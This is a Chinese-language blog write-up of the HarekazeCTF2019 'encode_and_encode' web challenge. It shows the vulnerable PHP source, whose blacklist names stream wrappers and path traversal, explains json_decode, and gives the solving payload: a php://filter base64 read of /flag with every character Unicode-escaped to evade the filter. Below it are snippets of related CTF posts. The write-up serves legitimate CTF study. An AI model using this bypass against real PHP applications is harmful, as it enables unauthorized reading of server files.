[HarekazeCTF2019]encode_and_encode

最新推荐文章于 2024-10-30 19:09:39 发布
最新推荐文章于 2024-10-30 19:09:39 发布
阅读量155 收藏
点赞数
CC 4.0 BY-SA版权
分类专栏: ctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/jvkyvly/article/details/115331932 
<?php
error_reporting(0);

if (isset($_GET['source'])) {
  show_source(__FILE__);
  exit();
}

function is_valid($str) {
  $banword = [
    // no path traversal
    '\.\.',
    // no stream wrapper
    '(php|file|glob|data|tp|zip|zlib|phar):',
    // no data exfiltration
    'flag'
  ];
  $regexp = '/' . implode('|', $banword) . '/i';
  if (preg_match($regexp, $str)) {
    return false;
  }
  return true;
}

$body = file_get_contents('php://input');
$json = json_decode($body, true);

if (is_valid($body) && isset($json) && isset($json['page'])) {
  $page = $json['page'];
  $content = file_get_contents($page);
  if (!$content || !is_valid($content)) {
    $content = "<p>not found</p>\n";
  }
} else {
  $content = '<p>invalid request</p>';
}

// no data exfiltration!!!
$content = preg_replace('/HarekazeCTF\{.+\}/i', 'HarekazeCTF{&lt;censored&gt;}', $content);
echo json_encode(['content' => $content]);

json_decode的语法规则:

json_decode ( string $json [, bool $assoc = false [, int $depth = 512 [, int $options = 0 ]]] )

json_decode接受一个JSON格式的字符串并且把它转换为PHP变量 ,
当该参数$assoc为TRUE时,将返回array,否则返回object。

JSON 格式的字符串
$json = ‘{“a”:“php”,“b”:“mysql”,“c”:3}’;
其中a为键,php为a的键值。

<?php   
$json = '{"a":"php","b":"mysql","c":3}';  
$json_Class=json_decode($json);   
$json_Array=json_decode($json, true);   
print_r($json_Class);   
print_r($json_Array);         
?>

 程序输出:
  stdClass Object (
  [a] => php
  [b] => mysql
  [c] => 3 )

  Array (
  [a] => php
  [b] => mysql
  [c] => 3 )

  在上面代码的前提下
  访问对象类型$json_Class的a的值
echo $json_Class->{'a'};
  程序输出:php

  访问数组类型$json_Array的a的值
echo $json_Array['a'];
  程序输出:php

主要就是考察 原生的$body字符串里面的字符还是\u编码,但经过json_decode之后,会经历一次Unicode解码

if (!$content || !is_valid($content)) {
    $content = "<p>not found</p>\n";
  }

也就是说内容中也不能出现 上面的黑名单,此时我们想到php://filter读取flag的base64格式,

{"page":"php://filter/convert.base64-encode/resource=/flag"}

{"page":"\u0070\u0068\u0070\u003A\u002F\u002F\u0066\u0069\u006C\u0074\u0065\u0072\u002F\u0063\u006F\u006E\u0076\u0065\u0072\u0074\u002E\u0062\u0061\u0073\u0065\u0036\u0034\u002D\u0065\u006E\u0063\u006F\u0064\u0065\u002F\u0072\u0065\u0073\u006F\u0075\u0072\u0063\u0065\u003D\u002F\u0066\u006C\u0061\u0067"}
[HarekazeCTF2019]Sqlite Voting
Jacob12774的博客
06-20 939
参考链接:https://www.cnblogs.com/20175211lyz/p/12264779.html 复现链接:https://buuoj.cn/challenges#[HarekazeCTF2019]Sqlite%20Voting 这里进去后发现有提供源代码,代码如下: <?php error_reporting(0); if (isset($_GET['source'])) { show_source(__FILE__); exit(); } function is_.
2021-08-30 BUUCTF刷题记录PWN
m0_56897090的博客
08-30 655
2021-08-30 BUUCTF刷题记录 刷题数量:13 题目分类:栈溢出、堆、pwn基础 文章目录2021-08-30 BUUCTF刷题记录[Black Watch 入群题]PWN0x00 题目描述0x01 分析思路0x02 EXPez_pz_hackover_20160x00 题目描述0x01 题目分析0x02 思路0x03 EXPjarvisoj_tell_me_something0x00 题目描述0x01 题目分析0x02 EXPJarvisoj_level30x00 题目描述0x01 题目思路0
[HarekazeCTF2019]encode_and_encode 1
wuyaowangchuan的博客
03-04 972
源代码里面有代码 <?php error_reporting(0); if (isset($_GET['source'])) { show_source(__FILE__); exit(); } function is_valid($str) { $banword = [ // no path traversal '\.\.', // no stream wrapper '(php|file|glob|data|tp|zip|zlib|phar):'.
[HarekazeCTF2019]encode_and_encode 1
最新发布
03-29
好的,用户需要关于HarekazeCTF2019encode_and_encode挑战的解题思路。首先,我需要回忆这个挑战的具体内容。可能涉及编码或注入漏洞? 根据用户提供的引用,其中提到了Crypto题目和PHP后门利用。不过encode_and_...
HarekazeCTF2019]encode_and_encode
02-27
### HarekazeCTF2019 Encode and Encode Challenge Overview 在HarekazeCTF2019中的`Encode and Encode`挑战涉及到了复杂的编码和加密机制。题目提供了一个Python脚本,该脚本使用了素数生成函数以及特定的位运算来...
[harekazectf2019]encode_and_encode
04-06
txt = 'HarekazeCTF{TestTestTest}' txt = hashlib.sha512(txt.encode('ascii')).hexdigest() txt = codecs.encode(txt.encode('ascii'), 'rot13') txt = base64.b64encode(txt.encode('ascii')).decode('ascii') ...
[HarekazeCTF2019]encode_and_encode1
alwtj的博客
10-30 555
所以我们需要绕过两个过滤,一个是最开始的 黑名单,也就是is_valid这个函数,然后就是$content = preg_replace('/HarekazeCTF\{.+\}/i', 'HarekazeCTF{}',这个函数加工了。而绕过 preg_replace()这个函数就更简单了,直接用伪协议php://filter/convert.base64-encode/resourc=/flag,使/flag的内容被 filter 处理,最终通过 base64 编码的形式返回.
练[HarekazeCTF2019]encode_and_encode
m0_66225311的博客
10-11 202
JSON对`Unicode`字符的解析转义,`json`格式的构建,代码审计,`php`伪协议的利用,`file_get_contents`函数结合`php://input`的使用
[HarekazeCTF2019]encode_and_encode(json字符转义)
qq_44657899的博客
11-14 1067
<?php error_reporting(0); if (isset($_GET['source'])) { show_source(__FILE__); exit(); } function is_valid($str) { $banword = [ // no path traversal '\.\.', // no stream wrapper '(php|file|glob|data|tp|zip|zlib|phar):', // n.
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值